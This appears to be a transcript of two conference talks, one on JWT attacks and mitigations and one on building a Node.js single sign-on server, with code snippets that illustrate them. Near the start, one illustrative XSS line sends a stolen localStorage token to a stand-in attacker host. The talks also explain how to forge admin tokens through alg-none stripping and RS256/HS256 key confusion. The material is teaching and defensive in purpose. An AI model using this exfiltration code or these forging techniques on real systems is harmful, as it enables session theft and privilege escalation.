The first attack I want to talk about is cross-site scripting, because I said JWTs are vulnerable to it. XSS is an attack where you basically inject... okay, let me give you an example. This is, like, the orange website, and I'm posting a comment. In the comment I'm saying "yeah, nice post," but what I'm really doing is inserting a script tag, and in the script I'm loading an image whose URL points at my own attacker website, passing the local storage token along. I'm basically stealing it. If the server doesn't sanitize these comments, doesn't sanitize user input, it just stores them, and when the next user opens the page, they only see "nice post," but that code runs and I've stolen their token. This is a super common, super old attack; the orange website takes care of it, so you don't have to worry there. But because JWTs are also stored on the client, they are vulnerable to XSS. Cool.
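For illustration only, the injected script in that example boils down to a one-liner like this (the attacker domain and storage key are made up):

```js
// Runs in every visitor's browser if the comment isn't sanitized:
// exfiltrate the token by "loading" an image from the attacker's server.
new Image().src =
  'https://attacker.example/steal?token=' +
  encodeURIComponent(localStorage.getItem('token'));
```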
More JWT-specific mistakes: the next one is using a weak algorithm for your signature. These are the three recommended ones, in increasing order of security. HS256 uses a shared secret; RS256 is slightly more secure because it uses a public and private key (the authentication server has the private key, and that's it; the API server doesn't need it, it uses the public key).

Third is using a weak secret. If you're using HMAC with a shared secret and the secret is weak, you're in trouble. The funny thing about HMAC is that these signatures are optimized for speed, so verification is really fast; the irony is that if somebody is brute-forcing your secret, they benefit from that same speed. It takes them less time, so it actually makes attacks slightly easier. The spec's recommendation is that if you're using HS256, the key should be at least 256 bits. You need very high entropy: "supersecret007" is a bad secret, and "l33t password," or whatever I wrote there, is too. Things with numbers and symbols that would work for your Gmail password are just not secure enough when it comes to HMAC. You really do need 256 bits, which is roughly 32 ASCII characters.

The next one, which I added at the last moment, is storing the token in local storage or in cookies. I call it the "it's just there for someone to take" attack. Number one: if you can, just don't store tokens on the client side at all. Don't put them in local storage; keep them in memory, and when the user refreshes, create a new token. That can be really annoying to implement, so the typical compromise is to still store it but give it a very short lifetime, so that by the time somebody can use it, it's already gone. The other thing is to keep expiring tokens and implement silent background re-authentication, because otherwise, every time I refresh the page, it would tell me "sorry, your session has expired, click login," and I'd have to go through the whole redirect dance again, which would be super annoying. So implement silent background authentication; auth0-js kind of does that for you. Use good open-source libraries. Important.
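A sketch of the short-lived-token advice with jsonwebtoken: the `expiresIn` option sets the `exp` claim, and verification fails once it has passed:

```js
const jwt = require('jsonwebtoken');

// Issue a token that dies on its own after 15 minutes.
const token = jwt.sign({ sub: '1234567890' }, process.env.JWT_SECRET, {
  algorithm: 'HS256',
  expiresIn: '15m',
});

// After expiry, jwt.verify() fails with a TokenExpiredError,
// which is the cue to silently re-authenticate in the background.
```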
The next mistake is reusing the same key across services. This is a really nice attack, called a substitution attack, and it looks something like this. You have two services. In the first service, John Doe is an admin; in the second, he's not. You do the typical authentication dance: send your credentials, get a JWT (call it JWT1), and use JWT1 to access data from the first service. That's the normal flow. Ideally, when you talk to service two, you should send your credentials to service two, get a different JWT, and use that one. But if you're an attacker, the first thing you'll try is: what happens if I use JWT1 with service two, just to probe the implementation? So I send JWT1, and if both services use the same secret, it checks out: it verifies, and it works. The problem is that JWT1 says admin: true, which was only ever meant for service one. Your API server relies on the authentication step to supply that admin flag, so if you're using the same secret everywhere, the token checks out and you're basically screwed.

You have two fixes. First: always set the audience in the payload. I mentioned this at the start: you can state who a token is intended for. So always set the audience, say "this token is only valid for service one," and when service two receives it, it checks the audience; even if the signature is valid, if the audience is someone else, it rejects the token. Second: just use different secrets. Then, even for the same payload, each service generates a different signature, so the substituted token doesn't match. The recommended approach is to do both: use different secrets, and always set the audience as a good practice.

Cool, attack number six: if you don't verify the algorithm, you're going to get screwed. This is called a signature stripping attack, and it's really neat. Here's the intended token with its signature. Strip the signature (remember, JWTs support unsigned tokens, algorithm `none`), then change the header to algorithm `none`. So I've done two things: stripped the signature and changed the algorithm to none (headers are just encoded, so I can decode them and change them), and I've also switched admin to true. Now on the server, if your verify call just takes the client token and the secret, the library may verify based on the algorithm in the header, which is none. So it says: okay, this token is unsigned, it's trivially "valid," pass it along. The bug is that you should always pass a whitelist of algorithms. And sometimes (I've seen this) there's a lazy approach where people say "I need to give a whitelist, so I'll just read it from the header, because that's the intended algorithm." Again: if the attacker changes the header to algorithm none, you've just shot yourself in the foot. Always have a hard-coded whitelist of valid algorithms; then the signature stripping attack stops working, because algorithm none gets rejected.
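Both fixes together might look like this sketch; the service names and secret variables are hypothetical:

```js
const jwt = require('jsonwebtoken');

// Each service signs with its own secret and stamps its own audience.
const token = jwt.sign({ sub: '1234567890', admin: true }, process.env.SERVICE1_SECRET, {
  algorithm: 'HS256',
  audience: 'service-one',
});

// Service two rejects this token twice over: wrong secret AND wrong audience.
jwt.verify(token, process.env.SERVICE2_SECRET, {
  algorithms: ['HS256'],   // hard-coded whitelist, never read from the header
  audience: 'service-two', // audience check is enforced by the library
}, (err) => {
  if (err) console.error('Rejected:', err.message); // the expected path here
});
```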
Version two of this attack is super interesting: you can use the RS256 public key as the HS256 secret. It's similar to the algorithm-none attack in that the goal is to fool the verification. Check this out. This token was created with RS256, which means the authentication server used the private key to create it, and the public key is used for verification. Now, the public key, as the name implies, is public; the attacker can get their hands on it, but that's supposed to be okay, because all they can do with it is verify. They can't change anything without the private key. So this is what verification looks like on the server: you pass the token, you pass the public key, verify. Can anyone tell me what the bug is right now? No, this is just the verification side; on the authentication server, the one that generates the token, you need the private key, but on your API server you just need the public key. There's a very simple bug here first, which is... yeah, somebody said it: the whitelist is missing. I was testing you. I just told you: always pass the algorithm whitelist. So we say these are the two algorithms this API supports.

But there's still a problem. Notice how this call looks a lot like HS256 verification. For HS256 you do verify with the token, the shared secret, and the list of algorithms; here you're doing verify with the token, the public key, and the algorithms. There's something weird in that overlap. What an attacker can do is change the algorithm from RS256 to HS256, of course do a privilege escalation by changing admin to true, and then create a new token on the fly: sign it with HS256, using the public RSA key as the shared secret. Suddenly this is a "valid" signature: it uses a secret, it uses HS256. And on the server side, you're doing the same verification call: the token, the public RSA key, and the whitelisted algorithms. You see the problem? The attacker changes the algorithm, and because the function signature looks the same, they fool your verification into treating this not as an RS256 signature but as an HS256 one; and because HS256 is in the whitelist, the library says "okay, I expected RSA, but I also support HS256, cool, I'll take it," and it verifies as true.

The fix: if you can, use one algorithm across all your applications. Pick HS256 or RS256 and stick to it throughout, so nobody can do this kind of substitution on you. If you can't (there are cases where a generic server has to support several), split the verification in two: create two different functions for the two methods, say a decode-RSA-token function and a decode-HMAC-token function (RSA for RS256, HMAC for HS256), and based on what's in the header, dispatch to the right one, with only that method's algorithms in each whitelist. The RSA function only allows RS256, so even if you try to fool it with an HMAC token, the signature check fails. So split them if you have to support both. Okay, that's good enough.
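A sketch of that dispatch, under the assumption that the unverified header is used only to pick a branch and each branch keeps its own hard-coded whitelist (the key path is hypothetical):

```js
const fs = require('fs');
const jwt = require('jsonwebtoken');

const publicKey = fs.readFileSync('./keys/auth-server-public.pem'); // hypothetical path

// Each verifier trusts exactly one algorithm family.
const decodeRsaToken = (token) =>
  jwt.verify(token, publicKey, { algorithms: ['RS256'] });
const decodeHmacToken = (token) =>
  jwt.verify(token, process.env.JWT_SECRET, { algorithms: ['HS256'] });

function verifyToken(token) {
  // Peek at the (unverified) header only to pick a branch,
  // never to build the whitelist itself.
  const header = JSON.parse(
    Buffer.from(token.split('.')[0], 'base64url').toString()
  );
  if (header.alg === 'RS256') return decodeRsaToken(token);
  if (header.alg === 'HS256') return decodeHmacToken(token);
  throw new Error(`Unsupported algorithm: ${header.alg}`);
}
```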
Do we take questions now, or in the break? Okay. Q: How does this compare to SAML tokens? A: SAML — I have no idea, honestly. Q: Another question, then. The tokens are created by the IdP, right — by the authorization server? A: Yeah. Q: So the key that the client sends to the authorization server — what is it actually made of? A: You're talking about the credentials part — let me go back to the diagram to make sure I understand. This key, right? That's your credentials — effectively your username and password. The diagram is a big-picture way of saying you need credentials to get authenticated; the implementation details vary a lot. Usually, if it's a third party, you redirect the user to them with a unique token; the third party hits your own servers to verify that it really is your application asking — there's a handshake between the authorization server and your services — and if the handshake succeeds, it issues a token that can be passed around. Q: And if it's a multi-tenant system, are you sending the tenant ID in that key? A: Yeah, totally. This is exactly where the advice comes in: if you have multiple services, don't use the same secret or the same keys. Which also means that if you have multiple services of your own and a third party does the authentication, always pass the audience claim, so that every audience — every API server you have — gets a different token. Q: With a single sign-on system like Google, Microsoft, or Auth0, you'd typically have a farm of thousands of servers, each with its own public/private key pair. How does the service know which server's public key to use? A: The authorization server? Q: No, no — the resource server. A: Oh, sorry — the API server, got it. You're asking how the API server knows which public key to use for verification. The fun part is that the public/private pair is between the authorization server and the resource server. When you create a new pair, you put the private key on the authorization server and keep the public half on the API server. If you have three API servers, you create three different pairs, put one public key on each, and tell the authorization server: for service one use this private key, for service two this one, for service three that one. In practice with a third party, you create three "services" on their dashboard or CLI, download three public keys, and install each on the specific API server that should use it. So if there are three API servers — three different resources — each holds only its own public key, not all of them. And to be clear: when I say authorization server, I don't mean an instance. If there are five load-balanced instances, that doesn't mean you need five different keys — they're replicas of each other with the same keys. By authorization server I mean one authorization app, one service: one service, one set of keys, and replicas share them.
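As a sketch of that setup, the authorization server might keep a small registry mapping each audience (each API service) to its signing key — a hypothetical illustration, not code shown in the talk:

```js
const jwt = require("jsonwebtoken");

// One key pair per API service (audience), not per instance.
// Load-balanced replicas of the authorization service share this map.
const signingKeys = {
  "service-one": SERVICE_ONE_PRIVATE_KEY,
  "service-two": SERVICE_TWO_PRIVATE_KEY,
  "service-three": SERVICE_THREE_PRIVATE_KEY,
};

function issueToken(payload, audience) {
  return jwt.sign(payload, signingKeys[audience], {
    algorithm: "RS256",
    audience, // ties the token to exactly one API server
    expiresIn: "1h",
  });
}

// Each API server then holds only its own public key for verification.
```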
Maybe I should just call it a service instead of a server. — Well, that was a fantastic talk. Okay, before we continue, we have an announcement. At every edition of the conference we do this thing called flash talks, for those of you who are new: you get five minutes to come up here and talk about anything you've done — at work, a personal project, anything you'd like to share, tech or not tech. The two of us are around; meet us now or at lunch, tell us what you'll talk about, and we'll slot you into the schedule. One more announcement: please turn off your mobiles — it's very annoying for the speakers. So: how many of you use social logins, like login with Facebook or Google? Still using Facebook, after all this? Okay. Is there a nicer way to authenticate? I don't know — maybe before May 2019 we'll have sign-in with Aadhaar coming up too. Hopefully not — you never know. Come on, we need good, nice authentication, and I think Arnab can speak about how authentication can be done right. One more thing: Arnab recently told us the HasGeek Android app is buggy because of something he did in the last fix, so he asked us to clear the air. The stage is yours — authentication done right. — So, we're going to talk about my journey of creating a federated login system — call it a single sign-on server — in Node. A disclaimer up front: don't consider me an expert in Node or in cybersecurity. Do your due diligence when you create an authentication system and figure things out on your own. I don't want this to come across as a best-practices talk; it's more the things we did, some that went wrong, and what we did to fix them — maybe some of it will help when you build a similar system. To start: what did we build? What do you even call a system like this — SSO, federated login, identity management, LDAP? Here's what we needed, and it's something very simple: a single system where users can log in with external service providers if they want to — Twitter login, Facebook login, that kind of thing. And we have a lot of different client apps: an e-learning app for watching videos, an app where people participate in contests — a microservice-ish architecture — and people should be able to log into all of them with a single identity. So there are two parts to it. One part is an OAuth client, which gets people logged into our system via a third-party service — the upper part of the diagram, logging in using other systems.
And of course we support local logins too — keeping an account with a username and password on our own system, no third party needed. The things we used to build it: PostgreSQL as the database for storing the credentials, and one of the most beautiful things — the last talk you heard was also from Auth0, and they run a service that gives you a completely outsourced identity-management system. What I really like is that a lot of the tools they used to build their own system are open source, so you can practically build your own copy of Auth0 using their tools — and our system is much like that. So: Passport, the common authentication library for Node.js, made by the people who built Auth0. Then there's the second part of the system, the OAuth server, which lets all of our client apps share a single login system — the lower half of the diagram. Some systems use authentication plus user roles for ACL; we have an app that needs the user's GitHub data to compute scores; and there are apps that do two-way data updates, where the user's information can be changed from the client app on the SSO server and the other way around. To do this we use a Node.js library called oauth2orize — the first version was called oauthorize, and they just added the 2 in the middle. It's a very simple way to create an OAuth 2.0 server without implementing a lot of things by hand. We also use libraries for sending verification emails, and Speakeasy — a library made, I'm told, by a bunch of Googlers — which lets you use Google Authenticator or any time-based OTP method. When we set out to build it, we had a few basic tenets from the beginning. First: no JavaScript. Yes, I'm saying this at a JavaScript conference — I mean no JavaScript on the front end of the login server only, not the client apps. Those are Ember apps, Vue.js apps, whatever. The authentication system itself does not rely on any front-end JavaScript. That completely eliminates XSS — no cross-site scripting to handle at all — and our cookies are HTTP-only. For perspective: disable JavaScript in your browser and try most Google services — Gmail, Google search — they work perfectly. You can build pretty complex things without front-end JavaScript; that's how the web was built at one point. And it helps with security. Second: save passwords with bcrypt. This is something I've seen a lot of people — ourselves included — experiment with, and it really boils down to keeping it simple: PBKDF2 or bcrypt are among the best methods.
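A minimal sketch of the bcrypt approach with the bcrypt npm package (the cost factor and the db helpers are illustrative; bcrypt generates and embeds the salt for you):

```js
const bcrypt = require("bcrypt");

async function storePassword(user, plaintext) {
  const hash = await bcrypt.hash(plaintext, 12); // 12 = cost factor (2^12 rounds)
  await db.saveUserHash(user.id, hash);          // db.saveUserHash is hypothetical
}

async function checkPassword(user, plaintext) {
  const hash = await db.getUserHash(user.id);
  // compare() re-hashes the candidate with the salt embedded in the stored hash.
  return bcrypt.compare(plaintext, hash);
}
```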
We use salts, but we don't use a pepper. For the scale we operate at and the attacks we can realistically face, I don't think peppers are needed — it would be overkill. Next: if you're creating an authentication system that a lot of your products share, then in this day and age one thing you should definitely have is letting users opt into 2FA. Unless you're a bank or something, you may not want to enforce it, but even a simple product should at least let people opt in. You can use OTP generation over SMS or email, or use Authy or Google Authenticator for a TOTP solution. Okay — and pretty contrasting after the last talk — we use JWTs a lot across our client apps. For example, our video player: the video gets signed with a JWT, and we use that to download the chunks. We do that on a lot of our application servers. But the authentication server itself does not use JWTs, for a few reasons. One I've told you already: we don't use JavaScript on the front end. One of the good ways of using a JWT is keeping it in RAM, not in storage, and that's not possible without front-end JavaScript. Two: we want server-side logout for the central authentication system. If you use JWTs, you end up making them stateful — you keep a blacklist or a whitelist — and once you have a blacklist or a whitelist you're storing state in the database anyway, so it's better to just fall back to plain tokens. And three: the entire half-hour download of JWT knowledge you got earlier — developers shouldn't need to understand all of it to implement the system. JWTs are easy to implement, but to implement them correctly you have to keep a lot of those attacks in mind. One more thing, if you're creating a single sign-on system — this is something we follow: we have mobile apps, and in the mobile apps, the username and password entry happens through a WebView. We don't collect the credentials in the native client and pass them over the API. I prefer doing it this way because in a WebView users can see the URL — so phishing gets prevented, man-in-the-middle gets prevented, and users can see whether it's over HTTPS — all of which is hard to see inside a native app. It's easy for somebody to decompile your app, modify it, and phish passwords out of it. Unless you're somebody like Facebook or Google, where people trust the app itself and know for sure they're using the real one, prefer a single UI for taking the password. There shouldn't be two or three different places where the user is submitting their trust.
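For the opt-in 2FA mentioned above, here's a minimal TOTP sketch with the speakeasy npm package (the storage step and variable names are illustrative):

```js
const speakeasy = require("speakeasy");

// Enrolment: generate a per-user secret; render secret.otpauth_url as a QR
// code so the user can add it to Google Authenticator or Authy.
const secret = speakeasy.generateSecret({ name: "MyApp (user@example.com)" });
// ...persist secret.base32 against the user record (hypothetical step)...

// Login: verify the 6-digit code the user typed in.
const ok = speakeasy.totp.verify({
  secret: storedBase32Secret, // the base32 secret saved at enrolment
  encoding: "base32",
  token: userSubmittedCode,
  window: 1, // tolerate one 30-second step of clock drift
});
```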
A few more things. When you're building a security system, decide what you cannot protect. This is very important, because there are attack vectors everywhere, and if you try to protect against all of them, you're going to end up with a mess. This is my favorite xkcd comic: all kinds of security measures on one side — and on the other, you can just beat the person and get the password. So that's a case we don't cover. Very simply: if somebody shares their password, or somebody watches somebody else type their password, we can't protect that. We protect our system up to the extent of our SSL certificate; client-side proxies and the like, we don't cover. It just complicates the thinking process — you start saying, okay, I'll protect against this, I'll protect against that. No point. Just handle the ones that are possible. Now, this is very important. How many of you here have used Aadhaar to enter an airport? Were you identified, or authenticated? Identification is just stating who you are — you tell your name, that's identification. Getting this distinction clear is essential when you're creating an auth system. Authentication is when you actually verify whether the identity that was provided is correct. And authentication happens in two ways. One is implied trust: you show your passport to somebody; they look at it and see that it looks authentic — the paper, the print quality — so they trust the Government of India and conclude you're authentic, because the passport doesn't look forged. The other way is what's called TOFU — trust on first use: the first time you meet a person, you agree on a secret word you share; in future, whenever you present that secret word, they know it's you. That's the password way of doing authentication. Either you trust a third party to identify the person, or you trust the person by default the first time and lean on that first trust from then on. And there's more than identification and authentication — there's authorization: you have access to something, and you allow somebody else to use it. As simple as that — that's authorization. There was a question here: what's the official name of HTTP error code 401? Unauthorized — or is it 403? Can somebody who is logged in get a 401? Can somebody who is logged out get a 403? Can the same route return a 401 and a 403 in different cases? Someone in the audience answers correctly: 401's name is Unauthorized, but it actually means unauthenticated. Per the HTTP spec the name is Unauthorized, but it does not mean unauthorized — 403 Forbidden is what actually means unauthorized. Only when you're not logged in do you get a 401; when you're logged in but don't have access to that particular route, you get a 403. Which brings us to authentication via authorization. Quick example: you want to prove you own a house. You can show the sale deed or a property certificate. The other way: you invite somebody home, and they assume it's your house. You authorized somebody to use your house, and ownership is implied.
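The 401-versus-403 distinction maps directly onto middleware. A minimal Express sketch (req.user and isAdmin are assumed to be set by earlier auth middleware; not code from the talk):

```js
const express = require("express");
const app = express();

function requireLogin(req, res, next) {
  // Not logged in at all: 401 — "Unauthorized", really unauthenticated.
  if (!req.user) return res.status(401).send("Unauthorized");
  next();
}

function requireAdmin(req, res, next) {
  // Logged in but lacking access to this route: 403 Forbidden.
  if (!req.user.isAdmin) return res.status(403).send("Forbidden");
  next();
}

// The same route can yield 401 or 403 depending on the caller's state.
app.get("/admin", requireLogin, requireAdmin, (req, res) => {
  res.send("admin dashboard");
});
```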
When we do OAuth, we're doing something very similar. The steps go like this: you open a browser; the browser sends a request to the server; the server gives you a login page; you click "Login with GitHub". The browser sends a request to GitHub, adding a client ID and a redirect URI so that GitHub knows which app is trying to log in. GitHub sends back its login page; I enter my username and password, which go in a POST request to GitHub, where the challenge gets verified — username and password correct or not. I'm not sharing my credentials with the Coding Blocks app, only with GitHub. And now there are two ways forward — blue pill or red pill: the implicit way and the explicit way of authenticating. The implicit way: GitHub redirects me back to my website, and the URL contains the auth token. At this point I'm already trusting that my browser opened my website correctly — there's implied trust there. Now if I want my profile details, my profile page can simply make an AJAX request to api.github.com/user, passing an Authorization: token header, and I get back name, email, and username. And see, this is where authentication-via-authorization happens: I authorized this app to get my profile information from GitHub, and the app takes that profile information and just trusts that the name and email are correct. The red pill is the explicit, authorization-code case: GitHub takes me back to my website, but this time it gives a grant code instead of an auth token. For this to work you obviously need a back-end server — it cannot work in a purely front-end system. You exchange the grant code for an auth token, pass the auth token to get your profile data, and then render the profile page. That's the kind of system we're using, and it needs no front-end JavaScript — the actual token exchange happens in the back end. If you lay all the steps out side by side — implicit versus explicit — the difference is that in the implicit flow, the token is exposed to the front end; in the explicit flow, it never leaves the back end.
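A minimal server-side sketch of that explicit (authorization code) exchange, assuming Express and node-fetch; the client ID/secret values are illustrative:

```js
const express = require("express");
const fetch = require("node-fetch");
const app = express();

app.get("/auth/github/callback", async (req, res) => {
  const { code } = req.query; // the grant code from GitHub's redirect

  // Exchange the grant code for an access token, server to server.
  const tokenRes = await fetch("https://github.com/login/oauth/access_token", {
    method: "POST",
    headers: { "Content-Type": "application/json", Accept: "application/json" },
    body: JSON.stringify({
      client_id: GITHUB_CLIENT_ID,
      client_secret: GITHUB_CLIENT_SECRET,
      code,
    }),
  });
  const { access_token } = await tokenRes.json();

  // Fetch the profile with the token; the token never reaches the browser.
  const profile = await fetch("https://api.github.com/user", {
    headers: { Authorization: `token ${access_token}` },
  }).then((r) => r.json());

  // ...create a session for profile.login here (application-specific)...
  res.redirect("/dashboard");
});
```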
While building this, here are some things we learned — sometimes by burning our fingers. You've had two security talks already, so a lot of this might be Captain Obvious, but it's important. We ran the system for more than a year, with about 10,000 users, without CSRF protection and without a Content Security Policy. That's the story of a lot of startups: you just start building, the prototype becomes production, and you don't notice when. Users start pouring in — friends and family today, real people tomorrow. As much as possible, don't do this. Maybe you do it the first time; the second time you make an app, don't. One major problem we had: we were saving sessions in memory. When we had to scale up, we switched to cluster mode, and it didn't even hit me at first. Some guy says: I'm trying to log into your website. I logged in, but when I refresh, sometimes the page opens and sometimes it says I'm logged out. Sometimes? What do you mean, sometimes? What had happened was: depending on the name-resolution strategy nginx was using, my requests were all served by one node of the cluster; his IP was rotating, so sometimes he hit node one and sometimes node two — and his session lived in node one's memory, not node two's. You can't scale if you save state in process memory; sessions belong in a shared store. Of course, it took us three or four days to figure that out. After all this, plus the transport-layer stuff, we worked out a basic-security-versus-overkill checklist. Set X-Frame-Options, preferably DENY, so people cannot put your website inside an iframe — that's a good one. Keep a Content Security Policy — definitely very useful; I recommend the GitHub engineering blog, which has a very nice article on how they do CSP. You should ideally have a specific CDN that serves your images, styles, and fonts, and whitelist it in your Content Security Policy: XSS via images is one of the easiest attacks people pull off, so don't allow it — keep a whitelist. And CSP is the place where you get a hard switch to disable JavaScript on the front end entirely: pass an empty list to script-src, and no JavaScript will execute on your site at all. Some production sites like Facebook and GitHub serve their JavaScript from a separate CDN and leave 'self' out of script-src, which means no code inline in the HTML ever executes — only the JavaScript that comes from the CDN. So if some Chrome extension, or a man in the middle, injects JavaScript into your page, it doesn't run. CSRF protection is very easy these days in Node.js: use csurf and relay the token. Basic hygiene — just do it. And this one is very important: I know a lot of people who think that if you're using a popular SQL library or an ORM, statements are always prepared, so SQL injection is a problem solved in a bygone era. It's not. Just last year, two SQL injection vulnerabilities were found in Sequelize, the most popular ORM in Node.js. They were patched — the current version has none — but you never know when a new feature brings a new injection with it. For this, read the nice write-up by Snyk; Snyk is also a good tool for checking whether your dependencies have known vulnerabilities. And the strategy security experts call defense in depth: validate your variables at every layer. On the client, if you have client-side JavaScript; if not, then model layer, view layer, controller layer — validate the input at every one. Don't assume that because one layer validated it, the next layer gets it clean automatically. Raw queries and the like — if you're doing that, of course, manually escape things.
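Much of that checklist can be expressed with Express and the helmet package. A minimal sketch (the CDN hostname is illustrative):

```js
const express = require("express");
const helmet = require("helmet");
const app = express();

// X-Frame-Options: DENY — nobody can put the site in an iframe.
app.use(helmet.frameguard({ action: "deny" }));

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      defaultSrc: ["'self'"],
      imgSrc: ["https://assets.example-cdn.com"],  // whitelist the asset CDN
      styleSrc: ["https://assets.example-cdn.com"],
      fontSrc: ["https://assets.example-cdn.com"],
      scriptSrc: ["'none'"], // the hard switch: no JavaScript runs at all
    },
  })
);
```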
Another thing we learned: you download the RFC, you see the spec is fine, you start implementing, and then — refresh tokens; there's a POST call, then a GET call, all of that — you think, I'll just make a separate endpoint that refreshes my tokens. You follow 90% of the spec, take one little shortcut, and it bites you in the back later. We've figured this out now: we never sidestep the spec. The refresh-token thing was exactly that — we implemented our own way of doing refresh tokens, server-to-server refresh calls without using the user scope, and first of all, that created a vulnerability. Second — and this is the thing about security — if you have a mobile app or a PWA, where you can't control the rate at which people update their clients, then once something is insecure, it's going to remain insecure for a long time. If you have an insecure API and you update it to a secure one, the old clients stop working. The business folks won't allow that: they'll say keep the old API open for two months, wait for people to update — and until then, you're living with a known vulnerability. You can't get out of it; the alternative is cutting off the ten thousand users who use it every day. Turning something insecure back into something secure is very hard, and going off-spec is how you risk ending up there. Another incident: we initially assumed people would always log in using a user scope, but some clients want to edit data not on behalf of a user — as the client itself. The OAuth spec supports this; we thought the case would never happen, and we had to rewrite a lot of the project to support it. Some things you can defer — defer, not ignore. Refresh tokens, say: it's fine to make people simply log in again when their tokens expire. Just don't implement a different way of refreshing tokens; either do it per spec or don't implement it at all — that's fine. Similarly with scopes: for clients, you can use a star scope for everything and add granular scopes later if you want. And one thing I do know: the password grant type. As I said with the single-UI model, don't support a scheme where the username and password are sent over a POST request in exchange for a grant. That grant type exists so OAuth 2.0 stays backwards compatible, but it makes OAuth insecure. Better not to implement it.
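A sketch of "don't implement the password grant" with oauth2orize, the library mentioned earlier as the basis of this server (the callback body and issueAccessToken helper are hypothetical; the point is which exchanges get registered at all):

```js
const oauth2orize = require("oauth2orize");
const server = oauth2orize.createServer();

// Register only the authorization-code exchange...
server.exchange(
  oauth2orize.exchange.code((client, code, redirectUri, done) => {
    // Look up the grant code and issue an access token.
    done(null, issueAccessToken(client, code)); // issueAccessToken is hypothetical
  })
);

// ...and simply never register oauth2orize.exchange.password. A
// grant_type=password request then fails instead of shipping raw
// credentials through your API.
```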
Now, moving toward the business and UX side of building a system like this, and the things that didn't work out until we fixed them. State management is a very important part of UX, and I'd like to show you a couple of things. First, zero login. This is one of our client apps, and I'm logged into it right now. If I go to another of our client apps — when I went to online.codingblocks.com, this site — I did not have to log in again. Related: if I'm on one of the apps and I've logged in on any other tab, I can click Login and I get logged in automatically. Then there are the one-click and two-click login paths. If I click Login and I'm not logged in right now, I can either enter my credentials or use one of the social providers — and if I'm already logged into the social provider, two clicks get me in. Finally, if I'm not logged in anywhere, it becomes a three-click model, because I have to log into Facebook as well. And there's another case, which I call the broken flow model. Somebody comes to our website without an account, clicks Login, lands on the single sign-on server, and signs up. But some of our products need a verified email address to work — they don't work with a plain signup; you have to verify your email too. At this point the flow breaks, because now they have to open their inbox, find the verification link, and open it. This is where a lot of systems fall over — even popular ones I've used: you click the verification link and you don't end up at the exact page where you started the whole cycle. Ideally you'd make the redirect URI part of the verification link itself — or, if that's not information you want going over email, fair enough: attach the redirect target in the database to the verification record. A lot of drop-off happens at this point; sometimes people just leave, and maybe the next day they come back and click the verification link. When they do, capture the user back at the same point in your product where they left. If they had added something to their cart, they'll go and buy it; if they end up on a profile page, they won't. This is very important: the broken flow should end at the same place it started from.
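A sketch of resuming the broken flow: store the user's return URL alongside the email-verification token instead of putting it in the email itself. The db and mailer helpers are hypothetical:

```js
const crypto = require("crypto");

async function sendVerificationEmail(user, returnTo) {
  const token = crypto.randomBytes(24).toString("hex");
  // Persist the redirect target with the token, e.g. returnTo = "/cart".
  await db.saveVerification({ userId: user.id, token, returnTo });
  await mailer.send(user.email, `https://account.example.com/verify/${token}`);
}

app.get("/verify/:token", async (req, res) => {
  const v = await db.findVerification(req.params.token);
  if (!v) return res.status(404).send("Invalid or expired link");
  await db.markEmailVerified(v.userId);
  // Land the user exactly where they left off, even a day later.
  res.redirect(v.returnTo || "/");
});
```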
Now, with one SSO server and a lot of client apps, we also need to separate our concerns. First, there's a data API: the client apps use the user API to get the user's details, and whenever data exchange happens, it happens over the versioned API — so if you change the SSO's API, you don't need to rewrite the code in all your client apps. If different apps need different sets of data, create scopes for them. The authentication flow itself — how we log in via Facebook or Twitter, or with our own challenge — isn't related to the client apps; that's purely at the SSO level, and we can change it on our own without versioning. But whenever client apps access data from the SSO: version it. Then, after a lot of back and forth, we ended up with a rule of thumb for what data to keep on the SSO server and what not to: only centralize something if at least two of our client apps need it — and only if it's user data. There's a lazy-developer trap here. You think: some information — demographics, countries, states, and so on — we need it in a lot of apps; let's just put it on the SSO server, since everybody talks to the SSO anyway. It's just going to slow your SSO server down needlessly. If you need global information across ten of your clients, create a separate microservice for it; don't dump things into the SSO server just because it's globally reachable. Centralize only what pertains to the user data. And always maintain this: if one of our client apps needs the user's GitHub profile or Facebook profile, those queries should go via the SSO server, so the trust always stays on the SSO side. The alternative is getting a Facebook token and passing it to a client app — but then the client app has to implement Facebook's refresh-token mechanism too, and you end up rewriting that everywhere. If the user did third-party authentication on the SSO server, accessing data from that third party should happen through the same flow. The challenge, then, is keeping data in sync across all of this. Some data will inevitably be redundant — the user's name, the profile photo — with copies in the client apps and in the SSO app. When it's really important to keep the data in sync, refresh it from the SSO server on every authentication; if it's not that critical, run cron jobs or similar to update it. And if there are data updates on the SSO server, don't create generic special-purpose APIs — do it over the proper HTTP API, using the user's token scope. Every client app should be treated equally; nobody should have a special hook that can rewrite an entire table in the database. That's where security flaws start happening. We've also found that whenever you want to implement something, taking a little time to check whether a specification or standard already exists pays off. One example specifically: all the countries, states, and cities in the world have ISO 3166 codes, which uniquely identify every region. You can use those as primary keys, because the ISO standard ensures they're unique. We migrated that data many times before finally just adopting the spec. Next: analytics and monitoring. Anybody remember getting those emails from Twitter or GitHub about how your passwords were probably logged? A lot of people got them. It was widely speculated — neither company actually confirmed it — that both used a similar Ruby-based logging framework in a log-everything mode that logged entire request bodies, which is how passwords ended up in the logs. So whenever you use log-everything frameworks, make sure you sanitize the logged values. A lot of libraries strip specific keys — a key named password will probably get dropped — but you should scrub manually as well.
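A heuristic log-scrubbing sketch along the lines just described — redact sensitive-looking keys before anything reaches the logger (the key list is illustrative):

```js
// Keys that should never appear in logs in the clear.
const SENSITIVE = /password|secret|token|authorization|card/i;

function scrub(value) {
  if (Array.isArray(value)) return value.map(scrub);
  if (value && typeof value === "object") {
    const out = {};
    for (const [key, val] of Object.entries(value)) {
      out[key] = SENSITIVE.test(key) ? "[REDACTED]" : scrub(val);
    }
    return out;
  }
  return value;
}

// Usage: logger.info(scrub(req.body)) instead of logger.info(req.body).
```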
